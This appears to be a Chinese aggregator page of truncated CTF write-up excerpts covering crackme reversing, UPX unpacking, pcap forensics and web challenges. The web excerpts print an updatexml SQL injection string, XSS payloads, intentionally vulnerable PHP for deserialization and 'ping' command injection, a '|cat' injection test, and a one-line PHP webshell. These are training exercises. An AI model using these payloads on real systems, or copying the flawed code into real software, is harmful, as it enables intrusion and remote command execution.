【CTF REVERSE】WHCTF2017-CRACKME】的更多相关文章

1.前言 假装大学生水一下CTF题目,常规思路.程序没有加壳,是VC写的MFC程序. 2.破题思路 1.MessageBox 下断点 2.找到提示错误字符串的函数B 3.跟踪函数 4.跟踪算法 3.实现过程 PEID查询无壳,进IDA查看字符串. 得到这个字符串的一个存放地址,向上跟踪到有这个字符串的地方,依稀可以看到加密后的Flag轮廓. .data:00403254 aVSIKTQU db '注册码要往这里填呀 ! ',0 ; DATA XREF: sub_401230+40o 当即想到有字…
1.前言 公司大拿给写的一个CTF逆向程序,提升我们组内人员的水平. 基于对话框MFC框架开发,使用EDIT控制特性隐藏Flag,可借助spy4win之类窗体工具找出Flag. 程序加UPX壳,已对壳信息混淆处理,PEiD无法识别出壳信息. DLL 依赖情况如图所示. 2.思路 程序用IDA查看的时候,因为有壳混淆后是没法跟下去的.这道题比较简单,破解还是常规思路... 1)手动脱UPX壳 2)IDA查找字符串,获取信息 3)跟踪调用的函数 3.过程 1.脱壳 UPX是一款常用的压缩壳,单步跟踪…
这场CTF中有一道题是分析pcap包的.. 13.大黑阔: 从给的pcap包里把图片提取出来,是一张中国地图. 题目提示是黑阔在聊天,从数据里可以找出几段话. 思路:主要考察wireshark的过滤规则与熟悉度. 如果熟悉发送数据包的格式截取特定的字符串 "[{'" ,就能找出聊天记录了,也可以通过以下两个步骤找出关键的图片. 1.通过http过滤语句过滤出聊天内容 ((http) && !(frame.len == 78)) && !(frame.le…
文件头文件尾总结 JPEG (jpg), 文件头:FFD8FF 文件尾:FF D9PNG (png), 文件头:89504E47 文件尾:AE 42 60 82GIF (gif), 文件头:47494638 文件尾:00 3B ZIP Archive (zip), 文件头:504B0304 文件尾:50 4B TIFF (tif), 文件头:49492A00 文件尾:Windows Bitmap (bmp), 文件头:424D 文件尾:CAD (dwg), 文件头:41433130 文件尾:Ad…
  偶然看到的比赛,我等渣渣跟风做两题,剩下的题目工作太忙没有时间继续做. 第1题 sql注入: 题目知识 考察sql注入知识,题目地址:http://101.200.145.44/web1//index.php 做题过程 第一步:注入Playload user=flag&pass=' or updatexml(1,concat(0x7e,(select pw from user limit 1,1 )),0)# ' 第二步:注入效果 Masel's secure site 重置数据库 Erro…
XSS练习平台 https://alf.nu/alert1 Warmup 1");alert(1)// Adobe 1");alert(1)// JSON </script><script>alert(1)</script>// JavaScript %22);alert(1)// Markdown [[a|http://onerror=alert(1)//]] DOM Comment#--><img src=a onerror=aler…
反序列化 漏洞代码 <?php error_reporting(0); if(empty($_GET['code'])) die(show_source(__FILE__)); class example { var $var='123'; function __destruct(){ $fb = fopen('./php.php','w'); fwrite($fb, $this->var); fclose($fb); } } $class = $_GET['code']; $class_un…
服务端请求伪造 如你所愿,这次可以读取所有的图片,但是域名必须是www开头 测试方法 POST /index.php HTTP/1.1 Host: 218.2.197.236:27375 Content-Length: 40 Cache-Control: max-age=0 Origin: http://218.2.197.236:27375 Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded…
命令执行 找到题目中的KEY KEY为八位随机字符数字,例如key:1234qwer.提交1234qwer 即可. 漏洞代码 <?php system("ping -c 2 ".$_GET['ip']); ?> 测试方法 http://localhost/command.php?ip=127.0.0.1|cat command.php…
函数绕过 <?php show_source(__FILE__); $c = "<?php exit;?>"; @$c.=$_GET['c']; @$filename = $_GET['file']; @file_put_contents($filename, $c); highlight_file('tmp.php'); ?> <?php system($_REQUEST['z']); ?> 测试方法 http://218.2.197.236:29…